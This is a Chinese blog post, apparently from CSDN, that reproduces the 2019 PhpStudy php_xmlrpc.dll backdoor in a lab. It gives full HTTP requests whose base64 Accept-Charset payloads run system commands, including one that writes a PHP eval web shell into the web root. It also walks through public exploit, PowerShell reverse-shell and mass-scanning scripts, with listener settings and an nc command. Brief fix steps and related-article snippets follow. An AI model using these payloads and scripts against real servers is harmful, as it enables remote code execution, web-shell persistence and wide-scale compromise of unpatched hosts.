PhpStudy BackDoor 2019漏洞

最新推荐文章于 2023-10-16 16:54:14 发布
最新推荐文章于 2023-10-16 16:54:14 发布
阅读量4.2k 收藏 4
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/105926151
版权

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

基础介绍

事件背景

北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组,非法牟利600多万元。

  • **漏洞:**程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门。
  • php.ini中必须要引用该模块,这样才能去复现该漏洞,若开启了xmlrpc功能,php就会加载这个php_xmlrpc.dll动态链接库文件,其中的恶意代码就会被触发。

xml rpc是使用http协议做为传输协议的rpc机制(远程过程调用),使用xml文本的方式传输命令和数据。

查看是否引用该模块:

方法1:通过php.ini配置文件查看,位置D:\phpStudy\PHPTutorial\php\php-5.4.45\ext
在这里插入图片描述
方法2:通过phpinfo查看
在这里插入图片描述

  • 影响版本:phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)

phpStudy20180211版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll
phpStudy20161103版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll
不管是第三方下载的还是官网下载的phpstudy均存在后门,存在于php5.4.45和php5.2.17,当切换到其他版本漏洞是不存在的。
在这里插入图片描述

有问题的文件:

Phpstudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
Phpstudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
Phpstudy\PHPTutorial\php\php-5.4.45-nts\ext\php_xmlrpc.dll

漏洞复现

攻击者:Windows 10系统
靶机:Windows 7虚拟机

1.是两台机器之间能够相互ping通;
2.在靶机中下载带有后门的PhpStudy 2018软件,打开PhpStudy软件,在D:\phpStudy\PHPTutorial\php\php-5.4.45\ext目录中使用记事本打开php_xmlrpc.dll,搜索eval关键词,查看植入的后门
在这里插入图片描述
在这里插入图片描述
3.打开PhpStudy 2018,切换到有后门的版本,并启动Apache和MySQL服务,攻击者在浏览器中访问靶机的IP,查看是否能启动WEB服务器
在这里插入图片描述
在这里插入图片描述
4.开启代理服务器,使用burpsuite拦截浏览器的请求包,将拦截下来的数据发送到到Repeater模块(重发),使用Ctrl+R或者点击Action --> Send to Repater
在这里插入图片描述
5.修改请求包,将Accept-Encding(浏览器可解析的编码方式): gzip,deflate逗号后面的空格删除,然后在deflate后面增加一个空格(没有Accept-Encding就自己加上)
复现漏洞的过程中,会遇到一个问题,请求包放到repeater时,会加入很多的空格。

Accept-Encoding: gzip, deflate

在Accept-Encoding中,deflate的前面都有一个空格,这个空格导致重访无法成功,去掉空格即可。
在这里插入图片描述
在这里插入图片描述
6.再添加一项:Accept-Charset(规定服务器处理表单数据所接受的字符集):,Accept-Charset后面跟要执行的命令(恶意代码需要经过Base64转码),即恶意代码,最后提交该请求包,查看响应包
在这里插入图片描述

实例——system(’<恶意命令>’);(别忘了最后的分号)

这个漏洞相当于是个eval()函数的代码执行,所以如果要执行os系统命令的话还要用system(’<恶意命令>’);

先base64编码,在BP工具中,打开Decoder(解码和编码)模块:
在这里插入图片描述
在这里插入图片描述
下图可以看到,在响应包中我们可以看到我们想要的信息,复现成功
在这里插入图片描述
在这里插入图片描述

写一句话木马菜刀链接:

执行恶意命令system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');将木马写入PHPTutorial\WWW\shell.php中

GET /index.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip,deflate
Connection: close
accept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=
Upgrade-Insecure-Requests: 1

在这里插入图片描述
可能遇到的问题
若无法成功连接,可能生成目录不对,执行命令tree /f查看文件树,找到可访问路径生成shell

GET /phpinfo.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none,
accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9

修复方法

1.在官网中下载最新的PhpStudy
2.将PhpStudy中php5.4和php5.2里面的php_xmlrpc.dll替换为官方的文件
3.使用phpstudy安全自检修复程序2.0

Exploit利用脚本

1.在GitHub中下载PHPStudy_BackDoor_Exp,链接为:https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp
在这里插入图片描述
环境为Python3,依赖request模块

2.把下载好的PHPStudy_BackDoor_Exp文件夹拷贝到靶机中(这里图个方便直接拷到靶机上了,也就是本地打本地),并在含有PHPStudy_BackDoor_Exp的文件夹中开启dos命令窗口

python phpstudy_backdoor.py  运行脚本

开启脚本成功
在这里插入图片描述
3.根据提示,输入目标主机(即出现漏洞的PhpStudy中web服务器地址),以及要执行的命令

  • 需要开启PhpStudy中的Apache和MySQL服务

在这里插入图片描述

  • 根据上图的提示所示,如果要执行os命令,命令必须是php函数,即使用system(’’);格式

在这里插入图片描述
在这里插入图片描述
参考:https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html

反弹shell脚本

https://github.com/rabbitmask/PHPStudy_BackDoor
就目前版本来讲,phpstudy是部署在Windows平台(确实存在linux版本,发布不久测试阶段)居多,主流Windows平台均已支持powershell(win7/server2008以上),我们反弹shell的探究借助powershell实现。

phpstudy_backdoor_shell.py

脚本一键反弹shell,自动bypass,关于原理,借助了powercat、powershell等,
所以请在powershell中执行`set-executionpolicy remotesigned`允许脚本执行。
Usage: python3 phpstudy_backdoor_shell.py [url]
#请先在脚本中配置监听地址与端口
listen_host='192.168.1.254'
listen_port='6666'

运行demo:

python phpstudy_backdoor_shell.py 127.0.0.1

nc -lvvp [port]

批量扫描存在PHPStudy_BackDoor的URL

phpstudy_backdoor_poc.py
https://github.com/rabbitmask/PHPStudy_BackDoor

多进程批量检测脚本,自动读取urls.txt中内容,然后进行批量检测
检测结果如发现漏洞会存入phpstudy_backdoor_urls.txt中

运行demo:

python phpstudy_backdoor_poc.py

[+] http://127.0.0.1 is vulnerable.
[-] http://192.168.1.1 is invulnerable.
[*] http://192.168.1.2 Looks Like Something Wrong.
[*] http://192.168.1.3 Looks Like Something Wrong.
zhang三
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy后门-插件、环境、复现
MzHeader的博客
10-24 1524
1.1 后门检测 影响: phpstudy 2016 php5.4 phpstudy2018 php-5.2.17和php-5.4.45 位置: 通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlr...
全国中职网络安全B模块之国赛题远程代码执行渗透测试 PHPstudy的后门漏洞分析
web13618542420的博客
07-31 638
需要工具和环境的可以加群809706080,有什么不会的也可以在里面提问,我看到会第一时间回答。
https phpstudy_有染PHPStudy_BackDoor
weixin_39923945的博客
11-29 210
前不久PHPStudy几乎要被玩坏,几乎没有什么技术水准的利用方式,破坏性却是巨大的。笔者亦是PHPStudy的铁粉,果不其然手头的服务器全部沦陷,心疼自己一秒,好在相关人员已经落网,这份长达多年的闹剧终于画上了个句号。从一个渗透测试工作者角度出发,我们来后知后觉的探究下这个后门的利用方式,来引起警示并帮助同为PHPStudy铁粉的用户进行批量快速的自己检测以即使的发现并修复漏洞。不管是...
phpStudy backdoor 2019后门漏洞复现过程记录
牛奶栗的小博客
11-11 877
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
全国中职网络安全B模块之国赛题远程代码执行渗透测试 //PHPstudy的后门漏洞分析
Ba1_Ma0的博客
07-02 3055
有什么不会的也可以在里面提问,我看到会第一时间回答进入桌面后,解压文件,可以看到有以下文件通过我朋友雨泽的中间件漏洞文章和这个php的版本,可以猜到这题考的是前几年phpstudy的后门漏洞雨泽的文章链接:https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5501phpstudy的后门漏洞大部分存在于: 我们打开这个文件目录找到后门文件然后将文件拖入ida pro
phpstudyRCE phpstudy漏洞
最新发布
04-20
PHPStudy RCE(Remote Code Execution)是指在使用PHPStudy工具的过程中,由于配置不当或存在漏洞,导致攻击者可以远程执行恶意代码并控制受影响的服务器。 以下是对PHPStudy RCE的简要介绍: PHPStudyPHPStudy...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 (4)
02-23
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本
01-22
4. **利用脚本**:PHPStudy_BackDoor_EXP脚本可能是为了检测系统是否受此后门影响,或者演示如何利用此漏洞进行攻击。 5. **应对策略**:对于这种安全问题,用户应定期更新PHPStudy到最新版本,确保所有安全补丁已...
phpstudy_pro 2019 64位集成运行环境,支持PHP7.3.4,MYSQL8.0.12
07-13
PHPStudy Pro 2019:64位集成运行环境详解》 PHPStudy Pro 2019是一款专为开发者设计的64位集成运行环境,它支持PHP5.2到PHP7.3的多版本运行,尤其值得一提的是,它内建了PHP7.3.4版本,为用户提供了更为高效和...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip
01-22
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip" 提示我们关注的是一个与PHPStudy相关的安全问题,具体来说是一个后门利用脚本。PHPStudy是一款广泛使用的PHP开发环境集成软件,它包括PHP、Apache、MySQL等...
php_backdoor.php
06-11
大马文件
phpStudy后门漏洞复现
LuckySec
08-20 5575
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
BackDoor
a1b2c3是弱口令
08-08 1619
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&amp;lt;'5.3.0'...
phpstudy_2016-2018_rce_backdoor后门漏洞复现
qq_58683895的博客
10-16 278
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 618
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
phpstudy后门预警及漏洞复现
热门推荐
ranuy阮的博客
09-24 1万+
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量...
phpstudy后门任意代码执行漏洞验证
JSH_CDX的博客
09-10 2618
一.详细描述 Phpstudy是一款免费的PHP调试环境的程序集成包。该程序包集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件,一次性安装,无需配置即可直接使用,具有PHP环境调试和PHP开发功能,在国内有着近百万的PHP语言学习者和开发者用户。 2019年9月20日,网曝非官网的一些下载站中的phpstudy版本存在后门文件,该后门可以造成远程PHP代码执行、执行操作系统命令、内网渗透、数据泄露等危害。PhpStudy后门代码存在于extphp_xmlrpc.
phpStudy远程RCE漏洞复现
weixin_43268670的博客
07-03 1966
大家好,刚刚来到csdn这个大家庭,以后准备把自己在网络安全的一些小知识记录在此,希望能和大家好好交流。 需要的工具: VMware Workstation Pro Windows7的/ 2008R2 BurpSuiteFree phpStudy20161103.zip(文中使用)phpStudy20180211.zip Python ...
自查phpstudy后门以及漏洞复现
潜心学安全的小白
10-08 1795
phpstudy事件描述自查后门漏洞复现环境准备漏洞利用修复建议 事件描述 杭州公安在9月20日发布的杭州警方通报打击涉网违法犯罪暨“净网行动2019”专项行动战果中提到,2016年发布的phpstudy版本被不法分子恶意植入后门,犯罪嫌疑人在2019年初被公安机关抓获。其利用植入的后门非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。受影响的用户还是比较多的。 ...
phpstudy漏洞
04-15
其中一个比较著名的漏洞PHPStudy的远程代码执行漏洞(CVE-2019-11043),该漏洞存在于PHPStudy的Apache组件中。攻击者可以通过构造特定的请求,利用该漏洞执行任意的PHP代码,从而获取服务器权限或者进行其他恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值